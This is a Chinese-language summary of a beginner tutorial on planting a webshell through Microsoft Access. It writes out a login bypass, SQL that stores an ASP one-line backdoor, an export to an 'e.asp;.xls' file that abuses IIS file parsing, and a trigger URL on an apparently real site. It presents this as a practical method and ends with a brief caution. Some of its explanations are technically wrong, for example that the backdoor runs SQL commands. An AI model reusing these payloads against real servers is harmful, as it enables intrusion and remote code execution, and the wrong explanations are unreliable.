本文主要介绍了如何利用Microsoft Access数据库来获取Webshell的一种技术方法,适用于对基础IT技术有一定了解但并非高级用户(即"菜鸟级别")的读者。作者分享了一种在特定网站环境下通过Access导出一句话木马实现Webshell获取的步骤。
首先,文章提到的"一句话写入成功"是指利用Access的SQL注入漏洞,通过创建和操纵数据库来执行恶意代码。在"admin/login.asp"页面,作者发现了一个可以自定义执行SQL的入口,这使得他能够利用'or'='or'类型的简单逻辑绕过认证,从而获取对数据库的控制权。
1. **创建表**: 作者创建了一个名为"a"的表,字段类型为字符,长度为50,用于存储SQL注入的代码。这里使用了SQL命令`createtablea(avarchar(50))`。
2. **插入恶意代码**: 在"a"字段中插入一句包含SQL注入代码的字符串,例如`insertintoa(a)values('<%executerequest(chr(35))%>')`,其中`<%executerequest(chr(35))%>`代表将请求参数转换为可执行的SQL命令。
3. **导出Excel文件**: 由于Access不支持直接导出危险格式,作者选择将包含恶意代码的表导出为物理路径的EXCEL文件(".xls"),利用IIS解析漏洞将Excel文件解释为动态网页,从而实现代码执行。`select*into[a]in'd:\freehost\yinhezb\web\admin\e.asp;.xls''excel4.0;'froma`这一SQL语句就是这个过程的关键。
4. **访问Excel文件**: 最后,通过在IE地址栏输入特定URL(`http://www.yhzb.com/admin/e.asp;.xls`),访问由Access导出的Excel文件,导致服务器解析并执行其中的恶意代码,从而获取Webshell。
这种方法与PHP网站中的outfile原理相似,但更加侧重于利用Access数据库作为中间媒介。文章指出,虽然这种技术在几年前可能已被部分人介绍过,但至今仍在某些场景中有效。作者还提醒读者,在实际操作时要谨慎,并避免滥用这些技术,以防止对网站造成破坏或违反规定。
总结来说,这篇教程提供了一种利用Access数据库和SQL注入技巧获取Webshell的实用方法,适合那些希望学习基础渗透技术的读者。同时,它也强调了信息安全和道德实践的重要性。